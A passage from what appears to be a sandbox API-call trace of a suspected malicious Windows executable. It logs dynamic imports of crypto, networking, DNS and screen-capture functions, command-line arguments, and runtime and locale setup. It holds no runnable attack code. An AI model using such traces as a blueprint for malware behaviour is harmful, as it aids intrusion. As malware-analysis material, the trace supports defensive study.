returned 0x7771df14 [0117.143] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0117.143] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0117.147] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetPathFromIDListW") returned 0x75a617bf [0117.147] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderLocation") returned 0x75a5e141 [0117.147] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0117.147] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0117.147] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0117.147] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0117.147] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0117.147] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0117.148] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0117.148] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0117.148] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0117.148] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0117.148] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0117.148] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0117.148] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0117.148] GetProcAddress (hModule=0x76e40000, lpProcName=0xc8) returned 0x76e43f21 [0117.148] GetProcAddress (hModule=0x76e40000, lpProcName=0xca) returned 0x76e4fd6b [0117.149] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0117.149] GetProcAddress (hModule=0x76e40000, lpProcName=0xc) returned 0x76e45dee [0117.149] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0117.149] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75660000 [0117.155] GetProcAddress (hModule=0x75660000, lpProcName="GetAdaptersInfo") returned 0x75669263 [0117.155] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0117.157] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0117.157] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0117.157] GetProcAddress (hModule=0x77230000, lpProcName=0x34) returned 0x77247673 [0117.157] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x75590000 [0117.163] GetProcAddress (hModule=0x75590000, lpProcName="DnsFree") returned 0x7559436b [0117.163] GetProcAddress (hModule=0x75590000, lpProcName="DnsQuery_W") returned 0x755a572c [0117.163] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0117.163] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0117.163] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0117.163] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0117.164] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectA") returned 0x770b85d4 [0117.164] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0117.164] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0117.164] GetProcAddress (hModule=0x770a0000, lpProcName="GetBitmapBits") returned 0x770bc155 [0117.164] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0117.164] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0117.164] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0117.164] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0117.164] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0117.164] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0117.172] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0117.172] atexit (param_1=0x1e20920) returned 0 [0117.183] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ebc8 | out: lpSystemTimeAsFileTime=0x18ebc8*(dwLowDateTime=0xe59b01c0, dwHighDateTime=0x1d5ff3b)) [0117.183] GetCurrentThreadId () returned 0xaf4 [0117.183] GetCurrentProcessId () returned 0xba8 [0117.183] QueryPerformanceCounter (in: lpPerformanceCount=0x18ebc0 | out: lpPerformanceCount=0x18ebc0*=23708823721) returned 1 [0117.252] GetStartupInfoW (in: lpStartupInfo=0x18eb58 | out: lpStartupInfo=0x18eb58*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76d43519, hStdOutput=0x77c5fd35, hStdError=0x77cc7daf)) [0117.273] GetProcessHeap () returned 0x2c0000 [0117.427] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0117.427] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0117.428] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0117.428] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0117.428] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0117.428] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0117.428] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0117.428] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0117.428] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0117.428] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0117.429] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0117.429] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0117.429] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0117.429] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0117.429] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0117.429] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0117.429] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0117.429] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0117.430] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0117.430] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0117.430] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0117.430] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0117.430] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0117.430] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0117.430] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0117.430] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0117.431] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0117.431] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0117.431] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0117.431] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0117.431] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0117.431] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0117.431] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0117.431] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0117.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3bc) returned 0x2df360 [0117.432] GetCurrentThreadId () returned 0xaf4 [0117.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2d0888 [0117.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x800) returned 0x2df728 [0117.443] GetStartupInfoW (in: lpStartupInfo=0x18eb28 | out: lpStartupInfo=0x18eb28*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x61690f57, hStdError=0x58)) [0117.444] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.444] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0117.444] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.444] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe\" --Admin IsNotAutoStart IsNotTask" [0117.444] GetEnvironmentStringsW () returned 0x2dff30* [0117.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xaca) returned 0x2e0a08 [0117.511] FreeEnvironmentStringsW (penv=0x2dff30) returned 1 [0117.522] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1a3e.tmp.exe.exe")) returned 0x36 [0117.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc4) returned 0x2dff30 [0117.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x98) returned 0x2e0000 [0117.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3e) returned 0x2d5758 [0117.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x6c) returned 0x2e00a0 [0117.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x6e) returned 0x2e0118 [0117.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x78) returned 0x2d2d28 [0117.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x62) returned 0x2e0190 [0117.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2e) returned 0x2db048 [0117.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x48) returned 0x2d6c00 [0117.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x28) returned 0x2daa70 [0117.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1a) returned 0x2df118 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x4a) returned 0x2e0200 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x72) returned 0x2d2da8 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x30) returned 0x2db080 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2e) returned 0x2db0b8 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1c) returned 0x2df140 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x2e0258 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x7c) returned 0x2e0338 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x36) returned 0x2e03c0 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3a) returned 0x2d57a0 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x90) returned 0x2e0400 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x24) returned 0x2daaa0 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x30) returned 0x2db0f0 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x36) returned 0x2e0498 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x48) returned 0x2d6c50 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x52) returned 0x2e04d8 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3c) returned 0x2d57e8 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x82) returned 0x2e0538 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2e) returned 0x2db128 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1e) returned 0x2df168 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2c) returned 0x2db160 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x54) returned 0x2e05c8 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x52) returned 0x2e0628 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2a) returned 0x2db198 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3c) returned 0x2d5830 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x54) returned 0x2e0688 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x24) returned 0x2daad0 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x30) returned 0x2db1d0 [0117.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x8c) returned 0x2e06e8 [0117.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0a08 | out: hHeap=0x2c0000) returned 1 [0117.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x800) returned 0x2e0780 [0117.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x80) returned 0x2e0f88 [0117.679] GetLastError () returned 0x0 [0117.679] SetLastError (dwErrCode=0x0) [0117.679] GetLastError () returned 0x0 [0117.679] SetLastError (dwErrCode=0x0) [0117.679] GetLastError () returned 0x0 [0117.679] SetLastError (dwErrCode=0x0) [0117.679] GetACP () returned 0x4e4 [0117.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x220) returned 0x2e1010 [0117.679] GetLastError () returned 0x0 [0117.679] SetLastError (dwErrCode=0x0) [0117.679] IsValidCodePage (CodePage=0x4e4) returned 1 [0117.679] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18eb1c | out: lpCPInfo=0x18eb1c) returned 1 [0117.689] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e5e4 | out: lpCPInfo=0x18e5e4) returned 1 [0117.698] GetLastError () returned 0x0 [0117.698] SetLastError (dwErrCode=0x0) [0117.698] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e9f8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e9f8, cbMultiByte=256, lpWideCharStr=0x18e368, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0117.707] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18e5f8 | out: lpCharType=0x18e5f8) returned 1 [0117.707] GetLastError () returned 0x0 [0117.707] SetLastError (dwErrCode=0x0) [0117.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e9f8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e9f8, cbMultiByte=256, lpWideCharStr=0x18e338, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0117.715] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0117.716] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e128, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0117.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18e8f8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ'\x0eia4ë\x18", lpUsedDefaultChar=0x0) returned 256 [0117.716] GetLastError () returned 0x0 [0117.716] SetLastError (dwErrCode=0x0) [0117.716] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e9f8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.716] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e9f8, cbMultiByte=256, lpWideCharStr=0x18e348, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0117.716] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0117.716] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e138, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ 